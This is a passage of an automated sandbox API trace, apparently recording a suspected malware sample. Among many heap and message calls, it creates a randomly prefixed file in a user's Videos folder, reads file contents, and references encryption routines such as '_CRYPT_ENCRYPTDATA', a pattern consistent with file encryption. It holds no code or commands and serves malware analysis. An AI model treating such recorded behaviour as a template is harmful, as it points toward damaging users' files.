[0198.204] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0198.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0198.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0198.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0198.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0198.204] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0198.204] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0198.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0198.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0198.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0198.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0198.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0198.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0198.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0198.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0198.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0198.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0198.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0198.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0198.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0198.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0198.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0198.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0198.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0198.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0198.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0198.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0198.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0198.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0198.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0198.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0198.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0198.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0198.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0198.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0198.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0198.206] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t")) returned 0x10 [0198.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0198.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0198.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0198.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0198.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0198.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0198.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0198.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0198.207] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.flyingship.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\d8qdzfy_.flyingship.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0198.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0198.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0198.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0198.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0198.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0198.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0198.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.208] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0198.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0198.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0198.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0198.208] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0198.208] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0198.208] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0198.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0198.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0198.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0198.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0198.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0198.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0198.209] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0198.209] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0198.212] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x2628, lpOverlapped=0x0) returned 1 [0198.212] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0198.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0198.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0198.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0198.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x12628) returned 0xbea018 [0198.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0198.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0198.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0198.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x12628) returned 0xbfc648 [0198.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0198.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.216] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0198.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0198.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x12628) returned 0xbea018 [0198.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0198.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0198.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0198.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.216] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0198.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0198.216] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0198.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0198.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.216] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0198.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x12628) returned 0xbea018 [0198.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27d8 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0198.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd918 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0198.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x12628) returned 0xa5f008 [0198.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0198.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0198.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0198.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0198.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0198.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0198.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0198.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0198.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0198.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0198.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0198.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0198.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0198.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0198.220] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0198.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0198.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0198.220] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0198.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0198.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0198.220] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0198.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2828 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0198.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda50 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0198.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0198.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0198.221] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0198.221] 